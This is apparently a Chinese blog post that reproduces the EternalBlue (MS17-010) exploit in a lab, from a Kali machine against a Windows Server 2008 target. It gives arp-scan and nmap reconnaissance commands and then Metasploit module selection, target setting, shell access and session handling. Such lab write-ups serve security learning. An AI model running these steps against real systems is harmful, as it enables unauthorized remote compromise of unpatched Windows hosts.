永恒之蓝漏洞复现(ms17-010)

永恒之蓝漏洞复现(ms17-010)
环境
信息收集
先扫描目标靶机IP
进入MSF查看是否存在永恒之蓝的漏洞
攻击

永恒之蓝漏洞复现(ms17-010)

环境

攻击机:kali

靶机:Windows Server 2008

信息收集

对ip进行收集开放什么端口

先扫描目标靶机IP

因为在同一个内网之中

所以可以使用arp-scan -l 进行查询

fig:

知道目标靶机IP(192.168.162.146)来进行更进一步的信息收集

fig:

nmap -sV -P- 192.168.162.146

使用nmap进行192.168.162.146IP下的全端口扫描

这里可以看出系统信息为Windows Server 2008

进入MSF查看是否存在永恒之蓝的漏洞

msfconsole
#搜寻模块
search ms17-010
#使用模块
use 3

fig:

show options

查看选项

fig:

set RHOSTS 192.168.162.146

设置目标IP

fig:

存在永恒之蓝的漏洞

返回

攻击

使用攻击模块

search ms17-010

use 0

fig:

set RHOSTS 192.168.162.146

fig:

攻击成功

fig:

输入shell

进入cmd模式

fig:

exit 退出shell
background 把shell放入后台

fig:

重新连接

sessions -i 1

fig:

posted @ 2024-03-25 11:10  安一_AA  阅读(26)  评论(0编辑  收藏  举报